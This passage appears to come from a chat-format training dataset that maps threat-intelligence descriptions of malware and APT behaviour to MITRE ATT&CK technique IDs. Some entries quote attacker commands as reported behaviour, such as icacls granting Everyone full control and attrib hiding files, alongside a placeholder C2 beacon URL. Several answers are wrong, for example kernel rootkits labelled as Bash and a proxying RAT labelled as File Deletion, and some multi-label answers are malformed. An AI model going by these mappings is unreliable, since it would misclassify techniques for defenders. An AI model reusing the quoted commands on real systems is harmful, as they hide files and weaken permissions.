Technique\". " }, { "role": "user", "content": "encrypts C2 traffic using an RC4 key." }, { "role": "assistant", "content": "T1573 - Encrypted Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This allows the shell to upload and download files, execute applications with web server account permissions, list directory contents, access Active Directory, access databases, and any other action allowed by the .NET runtime" }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Frankenstein, the threat actors used Empire to find the public IP address of a compromised system." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Once successfully installed in a system, Trickbot will gather system information such as OS, CPU, and memory information, user accounts, lists of installed programs and services." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In many cases, additional stealers, RATs, and other malware were observed being hosted on the same web servers.Analysis of HawkEye Reborn The campaign starts with sending the aforementioned Excel sheets that exploit the well-known CVE-2017-11882 vulnerability, an arbitrary code execution bug in Microsoft Office" }, { "role": "assistant", "content": "T1203 - Exploitation for Client Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can obtain a list of active connections and open ports." }, { "role": "assistant", "content": "T1049 - System Network Connections Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The PowerShell script executes a compressed first stage PowerShell child process, which then performs a second stage PowerShell process" }, { "role": "assistant", "content": "T1546.013 - Event Triggered Execution: PowerShell Profile', 'T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Mandiant assesses with moderate confidence that the threat actor obtained the session token from the operators of the info-stealer malware. These tokens were used by the actor via public VPN providers to authenticate to the target’s Microsoft 365 environment." }, { "role": "assistant", "content": "T1550.004 - Web Session Cookie" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Wizard Spider has gained access to credentials via exported copies of the ntds.dit Active Directory database." }, { "role": "assistant", "content": "T1003.003 - OS Credential Dumping: NTDS" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Dragonfly has moved laterally via RDP." }, { "role": "assistant", "content": "T1021.001 - Remote Services: Remote Desktop Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "While the decoy in Figure 2 is displayed, the macro will search the document for the delimiter ###$$$ and write the base64 encoded text that follows this delimiter to the file %APPDATA%\\Base.txt. OopsIE Trojan Analysis The OopsIE Trojan delivered in these attacks is packed with SmartAssembly and further obfuscated with ConfuserEx v1.0.0. By using the InternetExplorer application object, all C2 related requests will look as if they came from the legitimate browser and therefore will not contain any anomalous fields within the request, such as custom User-Agents. As seen in the above request, the Trojan will generate a URL for its beacon with the following structure: http://<c2 domain>/chk. hex(Environment.UserName/Environment.MachineName)> The Trojan will issue a request to this URL to check (hence the chk string in the URL) to see if the C2 server has a command for the Trojan to run. The C2 server will respond to the Trojan’s request by echoing the value <hex(Environment.UserName/Environment.MachineName)> if it wishes to provide additional commands. If the C2 server does not respond with the appropriate echoed data, the Trojan will create a file named srvCheckresponded.tmp in the SpecialFolder.CommonApplicationData folder and write nothing to it before exiting. If the C2 server provides the appropriate echoed data in the response, the Trojan attempts to determine what commands the C2 wishes to run by issuing a request to the following URL: http://<c2 domain>/what. hex(Environment.UserName/Environment.MachineName)> After issuing the what command, the Trojan will parse the C2's response for the string Oops, which the Trojan will treat as the C2 making a mistake and will exit. Otherwise, the Server will respond with a command followed by a set of parameters, split up by the delimiter <>: [command]<>[parameters for command in hexadecimal format] The available commands are" }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer', 'T1030 - Data Transfer Size Limits" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FakeM contains a keylogger module." }, { "role": "assistant", "content": "T1056.001 - Input Capture: Keylogging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BBSRAT can modify service configurations." }, { "role": "assistant", "content": "T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The infection process is rather interesting, as it involves multiple layers of .NET assemblies that will eventually download the NanoCore remote administration tool (RAT) from a remote server and inject it into another process. In some instances, we have also seen the RemcosRAT malware family delivered as the final payload. The infection process not only downloads and executes a payload, but it also downloads and opens a decoy document to lower the recipient's suspicions of the entire process" }, { "role": "assistant", "content": "T1055.002 - Process Injection: Portable Executable Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Figure 2: WindowsParentalControlsMigration CommandLineTemplate Figure 3 contains the decoded PowerShell command from the “CommandLineTemplate.” Figure 3: Decoded CommandLineTemplate PowerShell code POSHSPY PowerShell Component The full code for a POSHSPY sample is available here" }, { "role": "assistant", "content": "T1546.013 - Event Triggered Execution: PowerShell Profile', 'T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Skidmap uses fairly advanced methods to ensure that it and its components remain undetected. For instance, its use of LKM rootkits — given their capability to overwrite or modify parts of the kernel — makes it harder to clean compared to other malware. In addition, Skidmap has multiple ways to access affected machines, which allow it to reinfect systems that have been restored or cleaned up" }, { "role": "assistant", "content": "T1059.004 - Command and Scripting Interpreter: Bash" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT32 has abused the PasswordChangeNotify to monitor for and capture account password changes." }, { "role": "assistant", "content": "T1056.001 - Input Capture: Keylogging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Gamaredon Group has incorporated dynamic DNS domains in its infrastructure." }, { "role": "assistant", "content": "T1568 - Dynamic Resolution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Pupy can bypass Windows UAC through either DLL hijacking, eventvwr, or appPaths." }, { "role": "assistant", "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The code then uses the identified functions to add persistency through registry and add next stages file names identifier through the following locations" }, { "role": "assistant", "content": "T1037.001 - Boot or Logon Initialization Scripts: Logon Script (Windows)" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TeamTNT has run \"netstat -anp\" to search for rival malware connections. TeamTNT has also used `libprocesshider` to modify \"/etc/ld.so.preload\"." }, { "role": "assistant", "content": "T1049 - System Network Connections Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Tonto Team has used keylogging tools in their operations." }, { "role": "assistant", "content": "T1056.001 - Input Capture: Keylogging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Inception has used a reconnaissance module to gather information about the operating system and hardware on the infected host." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses a custom packer." }, { "role": "assistant", "content": "T1027.002 - Obfuscated Files or Information: Software Packing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "executes cmd.exe and uses a pipe to read the results and send back the output to the C2 server." }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "NETWIRE can persist via startup options for Login items." }, { "role": "assistant", "content": "T1547.015 - Boot or Logon Autostart Execution: Login Items" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "njRAT can capture screenshots of the victim’s machines." }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT32 have replaced Microsoft Outlook's VbaProject.OTM file to install a backdoor macro for persistence." }, { "role": "assistant", "content": "T1137 - Office Application Startup" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ZxxZ has used API functions such as `Process32First`, `Process32Next`, and `ShellExecuteA`." }, { "role": "assistant", "content": "T1106 - Native API" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A Patchwork .dll that contains BADNEWS is loaded and executed using DLL side-loading." }, { "role": "assistant", "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Bazar can use HTTP and HTTPS over ports 80 and 443 in C2 communications." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Donut includes subprojects that enumerate and identify information about Process Injection candidates." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PUNCHBUGGY has used python scripts." }, { "role": "assistant", "content": "T1059.006 - Command and Scripting Interpreter: Python" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "macOS.OSAMiner has used `launchctl` to restart the Launch Agent." }, { "role": "assistant", "content": "T1569.001 - System Services: Launchctl" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Lazarus Group malware KiloAlfa contains keylogging functionality." }, { "role": "assistant", "content": "T1056.001 - Input Capture: Keylogging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "gathers the name of the local host, version of GNU Compiler Collection (GCC), and the system information about the CPU, machine, and operating system." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "We will discuss the Spark backdoor’s functionality in detail later in this blog, but this specific sample has the following configuration" }, { "role": "assistant", "content": "T1027.002 - Obfuscated Files or Information: Software Packing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Screen capture and audio recording  SpyNote RAT was able to take screen captures and, using the device’s microphone, listen to audio conversations" }, { "role": "assistant", "content": "T1113 - Screen Capture', 'T1123 - Audio Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The White Company has checked the current date on the victim system." }, { "role": "assistant", "content": "T1124 - System Time Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Peppy has the ability to automatically exfiltrate files and keylogs." }, { "role": "assistant", "content": "T1020 - Automated Exfiltration" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Dtrack’s RAT makes a persistent target file with auto execution on the host start." }, { "role": "assistant", "content": "T1547 - Boot or Logon Autostart Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "WhisperGate can deobfuscate downloaded files stored in reverse byte order and decrypt embedded resources using multiple XOR operations." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A Turla JavaScript backdoor has used Google Apps Script as its C2 server." }, { "role": "assistant", "content": "T1102.002 - Bidirectional Communication" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Mis-Type uses Base64 encoding for C2 traffic." }, { "role": "assistant", "content": "T1132.001 - Data Encoding: Standard Encoding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "DropBook’s capabilities include checking installed programs and file names for reconnaissance, executing shell commands received from Facebook or Simplenote, and fetching additional payloads from Dropbox and running them" }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell', 'T1105 - Ingress Tool Transfer', 'T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "For Operation Spalax, the threat actors used XOR-encrypted payloads." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "creates a new Windows service with the malicious executable for persistence." }, { "role": "assistant", "content": "T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT41 has encrypted payloads using the Data Protection API (DPAPI), which relies on keys tied to specific user accounts on specific machines. APT41 has also environmentally keyed second stage malware with an RC5 key derived in part from the infected system's volume serial number." }, { "role": "assistant", "content": "T1480.001 - Environmental Keying" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "StrongPity has encrypted C2 traffic using SSL/TLS." }, { "role": "assistant", "content": "T1573.002 - Asymmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Other researchers have attributed these attacks to a group known as the Cobalt Gang, which has continued its activities even after the arrest of its alleged leader in Spain this year. AppLocker works well for executables and over time it has also been improved to control various script types, including JScript, PowerShell and VBScript. This has significantly reduced the attack surface and forced attackers, including more sophisticated groups, to find new methods of launching executable code. Payload dropper in an XSL file Another executable used to attempt bypass of the AppLocker feature is msxsl.exe, a Windows utility used to run XSL (eXtensible Stylesheet Language) transformations. Stage 4 — Downloaders . PowerShell leading to shellcode . The PowerShell chain is launched from an obfuscated JScript scriptlet previously downloaded from the command and control (C2) server and launched using cmstp.exe. JScript downloader . As opposed to PowerShell loading a Cobalt Strike beacon, the other observed infection chain continues using JScript to deliver the final payload, which is a JScript backdoor. The commands are relatively limited, but are sufficient enough to instruct the backdoor to download and execute a new payload, remove itself from the system or download and launch additional scriptlets. Interestingly, if an attack used version 4.4, the attackers decided to add a variable \"researchers\" initialized to the string \"We are not cobalt gang, stop associating us with such skids. Cobalt Strike beacon . On the PowerShell side of the infection chain, the downloaded final payload is a Cobalt Strike beacon, which provides the attacker with rich backdoor functionality. Cobalt Strike is used by penetration testers and offensive security researchers when delivering their services, but it is generally, just as Meterpreter, detected by anti-malware software as it can be easily used by malicious actors" }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Smoke Loader injects into the Internet Explorer process." }, { "role": "assistant", "content": "T1055 - Process Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can delete itself or specified files." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Shark binaries have been named `audioddg.pdb` and `Winlangdb.pdb` in order to appear legitimate." }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Magic Hound has used open-source JNDI exploit kits to exploit Log4j (CVE-2021-44228) and has exploited ProxyShell (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207) on MS Exchange servers." }, { "role": "assistant", "content": "T1190 - Exploit Public-Facing Application" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "After dropping these files to its working directory, the malware attempts to change the attributes of all the files to “hidden” and grant full access to all files in the current directory and any directories below. It does this by executing “attrib +h .”, followed by “icacls . /grant Everyone:F /T /C /Q" }, { "role": "assistant", "content": "T1222.001 - File and Directory Permissions Modification: Windows File and Directory Permissions Modification" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This crafted zip archive exploited a WinRAR flaw that makes files in zip archives appear to have a different name and file extension" }, { "role": "assistant", "content": "T1560 - Archive Collected Data" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Gelsemium has the ability to compress its components." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Darkhotel has dropped an mspaint.lnk shortcut to disk which launches a shell script that downloads and executes a file." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell', 'T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The backdoor starts by collecting basic information about the victim’s machine and calculating a 4-byte long victim identifier, based on the user-name, computer-name and the domain name of the target environment" }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "LoudMiner has set the attributes of the VirtualBox directory and VBoxVmService parent directory to \"hidden\"." }, { "role": "assistant", "content": "T1564.001 - Hide Artifacts: Hidden Files and Directories" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has a command to upload a file to the victim machine." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Turla surveys a system upon check-in to discover running services and associated processes using the \"tasklist /svc\" command." }, { "role": "assistant", "content": "T1007 - System Service Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Rover automatically searches for files on local drives based on a predefined list of file extensions and sends them to the command and control server every 60 minutes. Rover also automatically sends keylogger files and screenshots to the C2 server on a regular timeframe." }, { "role": "assistant", "content": "T1020 - Automated Exfiltration" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Machete hijacks the clipboard data by creating an overlapped window that listens to keyboard events." }, { "role": "assistant", "content": "T1115 - Clipboard Data" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Payloads are now hosted on compromised websites. The payloads hosted on these websites consist of seemingly benign BMP image files. The malicious macros download the images and the ObliqueRAT payload is extracted to disk. The ObliqueRAT payload is renamed with the .pif file extension" }, { "role": "assistant", "content": "T1027.003 - Steganography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "contains keylogging functionality that will monitor for active application windows and write them to the log, it can handle special characters, and it will buffer by default 50 characters before sending them out over the C2 infrastructure." }, { "role": "assistant", "content": "T1056 - Input Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "First, the malware checks for the existence of a Mutex value, “EKANS”, on the victim. If present, the ransomware will stop with a message “already encrypted. Otherwise, the Mutex value is set and encryption moves forward using standard encryption library functions. Primary functionality on victim systems is achieved via Windows Management Interface (WMI) calls, which begins executing encryption operations and removes Volume Shadow Copy backups on the victim" }, { "role": "assistant", "content": "T1486 - Data Encrypted for Impact" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Olympic Destroyer utilizes PsExec to help propagate itself across a network." }, { "role": "assistant", "content": "T1569.002 - System Services: Service Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BabyShark has executed the \"reg query\" command for \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\"." }, { "role": "assistant", "content": "T1012 - Query Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "OilRig has used automated collection." }, { "role": "assistant", "content": "T1119 - Automated Collection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ursnif has used \"CreateProcessW\" to create child processes." }, { "role": "assistant", "content": "T1106 - Native API" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "encrypts data sent to its C2 server over HTTP with RC4." }, { "role": "assistant", "content": "T1573 - Encrypted Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "LookBack malware is a remote access Trojan written in C++ that relies on a proxy communication tool to relay data from the infected host to a command and control IP" }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In the first path, obtaining the SAML signing certificate normally entails first querying the private encryption key that resides on the AD FS container and then using that key to decrypt the signing certificate. The certificate can then be used to create illicit but valid SAML tokens that allow the actor to impersonate users, enabling them to access enterprise cloud applications and services" }, { "role": "assistant", "content": "T1552.004 - Unsecured Credentials: Private Keys', 'T1550 - Use Alternate Authentication Material" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Out1 can use HTTP and HTTPS in communications with remote hosts." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used RC4 encryption (for Datper malware) and AES (for xxmm malware) to obfuscate HTTP traffic." }, { "role": "assistant", "content": "T1573 - Encrypted Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "creates a new service named “ntssrv” that attempts to appear legitimate; the service's display name is “Microsoft Network Realtime Inspection Service” and its description is “Helps guard against time change attempts targeting known and newly discovered vulnerabilities in network time protocols.”" }, { "role": "assistant", "content": "T1036 - Masquerading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "is capable of file deletion along with other file system interaction." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used various types of scripting for execution, including .bat and .vbs scripts. The group has also used macros to deliver malware such as and ." }, { "role": "assistant", "content": "T1064 - Scripting" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Metamorfo has a function to hijack data from the clipboard by monitoring the contents of the clipboard and replacing the cryptocurrency wallet with the attacker's." }, { "role": "assistant", "content": "T1115 - Clipboard Data" } ] }, { "messages": [ { "role": "system", "content": "Given a 